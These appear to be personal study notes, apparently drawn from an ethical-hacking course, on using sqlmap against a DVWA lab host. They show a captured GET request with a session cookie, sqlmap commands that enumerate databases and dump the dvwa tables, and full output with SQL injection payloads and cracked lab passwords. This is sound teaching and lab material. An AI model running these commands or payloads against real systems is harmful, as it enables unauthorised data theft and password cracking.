0xnhl

Back

SQLmap

Created: 1/12/2026 Updated: 1/12/2026
#cybersec/tools#cybersec#ciscoeh

SQLmap is often considered a web vulnerability and SQL injection tool. It helps automate the enumeration of vulnerable applications, as well as the exploitation of SQL injection.

Let’s take a look at a quick example of how to use SQLmap to exploit an SQL injection vulnerability. Say that a host with IP address 10.1.1.14 is vulnerable to SQL injection. In order to automate the enumeration and exploitation of this vulnerability, you first connect to the vulnerable application and capture the HTTP GET request by using a proxy. ( Module 6 describes how proxies work.) Example 10-15 shows the captured HTTP GET request to the vulnerable server (10.1.1.14).

Example 10-15 - HTTP GET Request to a Vulnerable Web Application

GET /dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit HTTP/1.1Host: 10.1.1.14User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://10.1.1.14/dvwa/vulnerabilities/sqli/Cookie: security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4Connection: closeUpgrade-Insecure-Requests: 1
plaintext

The first highlighted line in Example 10-15 shows the GET request’s URI. The second highlighted line shows the cookie and the session ID (PHPSESSID=1558e11b491da91be3b68e5cce953ca4). You can use this information to launch the SQLmap tool, as shown in Example 10-16.

Example 10-16 - Using the SQLmap Tool to Exploit an SQL Injection Vulnerability

root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" --dbs         ___        __H__ ___ ___[.]_____ ___ ___ {1.2.4#stable}|_ -| . [)] | .'| . ||___|_ [.]_|_|_|__,| _|          |_|V         |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets withoutprior mutual consent is illegal. It is the end user's responsibilityto obey all applicable local, state and federal laws. Developersassume no liability and are not responsible for any misuse or damagecaused by this program[*] starting at 21:49:11[21:49:11] [INFO] testing connection to the target URL[21:49:11] [INFO] testing if the target URL content is stable[21:49:12] [INFO] target URL content is stable[21:49:12] [INFO] testing if GET parameter 'id' is dynamic...<output omitted for brevity>...[21:50:12] [INFO] target URL appears to have 2 columns in query[21:50:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1to 20 columns' injectable[21:50:12] [WARNING] in OR boolean-based injection cases, pleaseconsider usage of switch '--drop-set-cookie' if you experience anyproblems during data retrievalGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 201HTTP(s) requests:---Parameter: id (GET)     Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQLcomment) (NOT)    Payload: id=omar' OR NOT 3391=3391#&Submit=Submit    Type: error-based    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause(FLOOR)    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 2 columns     Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a, 0x716a717671), NULL#&Submit=Submit---[21:50:22] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 8.04 (Hardy Heron)web application technology: PHP 5.2.4, Apache 2.2.8back-end DBMS: MySQL >= 4.1[21:50:22] [INFO] fetching database namesavailable databases [7]:[*] dvwa[*] information_schema[*] metasploit[*] mysql[*] owasp10[*] tikiwiki[*] tikiwiki195[21:50:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'[*] shutting down at 21:50:22
plaintext

The first four highlighted lines in Example 10-16 show how SQLmap automates the various tests and payloads sent to the vulnerable application. (You might recognize some of these SQL statements and queries from Module 6.) The last few highlighted lines show how SQLmap was able to enumerate all the databases in the SQL server.

When you have a list of all available databases, you can try to retrieve the tables and records of the dvwa database by using the command shown in Example 10-17.

Example 10-17 - Retrieving Sensitive Information from a Database

root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" -D dvwa --dump-all ___...<output omitted for brevity>...[22:14:51] [INFO] resuming back-end DBMS 'mysql'[22:14:51] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)     Type: boolean-based blind   Title: OR boolean-based blind - WHERE or HAVING clause (MySQLcomment) (NOT)   Payload: id=omar' OR NOT 3391=3391#&Submit=Submit     Type: error-based    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause(FLOOR)    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit     Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 2 columns Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a,0x716a717671),NULL#&Submit=Submit---[22:14:52] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 8.04 (Hardy Heron)web application technology: PHP 5.2.4, Apache 2.2.8back-end DBMS: MySQL >= 4.1[22:14:52] [INFO] fetching tables for database: 'dvwa'[22:14:52] [WARNING] reflective value(s) found and filtering out[22:14:52] [INFO] fetching columns for table 'users' in database'dvwa'[22:14:52] [INFO] fetching entries for table 'users' in database'dvwa'[22:14:52] [INFO] recognized possible password hashes in column'password'...<output omitted for brevity>...[22:15:06] [INFO] starting dictionary-based cracking (md5_generic_passwd)[22:15:06] [INFO] starting 2 processes[22:15:08] [INFO] cracked password 'charley' for hash'8d3533d75ae2c3966d7e0d4fcc69216b'[22:15:08] [INFO] cracked password 'abc123' for hash'e99a18c428cb38d5f260853678922e03'[22:15:11] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'[22:15:13] [INFO] cracked password 'letmein' for hash'0d107d09f5bbe40cade3de5c71e9e9b7'Database: dvwaTable: users[5 entries]+---------+--------+------------------------------------------------------+---------------------------------------------+-----------+-------------+| user_id| user | avatar | password | last_name | first_name |+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+----------------+| 1 | admin | http://172.16.123.129/dvwa/hackable/users/admin.jpg |5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin || 2 | gordonb| http://172.16.123.129/dvwa/hackable/users/gordonb.jpg|e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon || 3 | 1337 | http://172.16.123.129/dvwa/hackable/users/1337.jpg |8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack  || 4 | pablo | http://172.16.123.129/dvwa/hackable/users/pablo.jpg |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo || 5 | smithy | http://172.16.123.129/dvwa/hackable/users/smithy.jpg|5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+---------------+[22:15:17] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/users.csv'[22:15:17] [INFO] fetching columns for table 'guestbook' in database'dvwa'[22:15:17] [INFO] fetching entries for table 'guestbook' in database'dvwa'Database: dvwaTable: guestbook[1 entry]+------------+------+-------------------------+| comment_id| name  | comment |+------------+------+-------------------------+| 1            | test | This is a test comment.|+------------+------+-------------------------+[22:15:17] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/guestbook.csv'[22:15:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'[*] shutting down at 22:15:17
plaintext

The first four highlighted lines in Example 10-17 show how SQLmap was able to automatically enumerate users from the compromised database and crack their passwords.